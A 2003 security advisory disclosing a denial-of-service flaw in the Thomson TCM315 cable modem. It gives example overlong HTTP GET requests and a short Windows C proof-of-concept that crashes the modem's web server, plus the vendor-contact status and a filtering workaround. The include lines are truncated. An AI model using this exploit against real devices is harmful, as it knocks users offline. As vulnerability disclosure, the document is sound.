___________________________________________________________________________ . : Shell Security Advisory : . Subject: Buffer overflow in the cable modem Thomson TCM315 Issue date: 2003 November 23 Related link: http://www.shellsec.net/leer_advisory.php?id=2 Homepage: http://www.shellsec.net Info about product: http://www.qb.ro/docs/tcm315.pdf ___________________________________________________________________________ [ - 1 - Introduction ] ---------------------------- Software description: Thomson TCM315 cable modem - DOCSIS 1.0 certified - DOCSIS 2.0 ready and DOCSIS 1.1 compliant - NAT/PAT/Firewall and integrated router for SOHO installations (in a separate software release) - Bridging between the USB and Ethernet port - Easy Access to Advanced Diagnostics Web Pages - USB port for easy installation - Reliable high-performance platform - Surf the Internet Up to 100 Times Faster than a 56k analog Modem - Internet On-Off button for enhanced security [ - 2 - Problem description ] ---------------------------------------- The problem appears by sending an HTTP request with a long string to the cable modem, causing a deny of service (DoS). Example: GET /AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \ AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1 or http:///AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \ AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA [ - 3 - How to exploit it ] ---------------------------------- To test this vulnerability, we used the next code. Note: the code is written in C to be used in Windows systems, but it's easily portable to Unix systems. --------------------- CUT HERE --------------------- /* ADVISORY - Thomson Cablemodem TCM315 Denial of Service Shell security group (2003) http://www.shellsec.net November 10 of 2003 Tested against: TCM315 MP Software Version: ST31.04.00 Software Model: A801 Bootloader: 2.1.4c Impact: Users with access to the network can remotely shutdown internet connection. Discovered by: aT4r Andres[at]shellsec.net Vendor: contacted (no answer) Fix: no yet usage: just, thdos.exe 192.168.100.1 */ #include #include void main(int argc,char *argv[]) { char evil[150],buffer[1000]; struct sockaddr_in shellsec; int fd; WSADATA ws; WSAStartup( MAKEWORD(1,1), &( ws) ); shellsec.sin_family = AF_INET; shellsec.sin_port = htons(80); shellsec.sin_addr.s_addr = inet_addr(argv[1]); memset(evil,'\0',sizeof(evil)); memset(evil,'A',100); sprintf(buffer,"GET /%s HTTP/1.1\r\n\r\n\r\n",evil); fd = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP); if (connect(fd,( struct sockaddr *)&shellsec,sizeof(shellsec)) != -1) { send(fd,buffer,strlen(buffer),0); printf("done. Thomson Cablemodem reset!\n"); sleep(100); } else printf("Unable to connect to CM.\n"); } --------------------- CUT HERE --------------------- [ - 4 - Solution ] ----------------------- Thomson was advised about this vulnerability, but we got no answer, so as we know there is no patch to fix this issue.. As a possible solution, you can filter requests made to the cable modem. [ - 5 - Credits ] --------------------- Autor: Andrés Tarascó ( andres[at]shellsec.net ) Redactor: Fernando Ortega ( fernando[at]shellsec.net ) Issue date: 23 de Noviembre de 2003 Url: http://www.shellsec.net _______________________________________________________ Administrador de Shell Security (admin[at]shellsec.net) Shell Security Group (http://www.shellsec.net) _______________________________________________________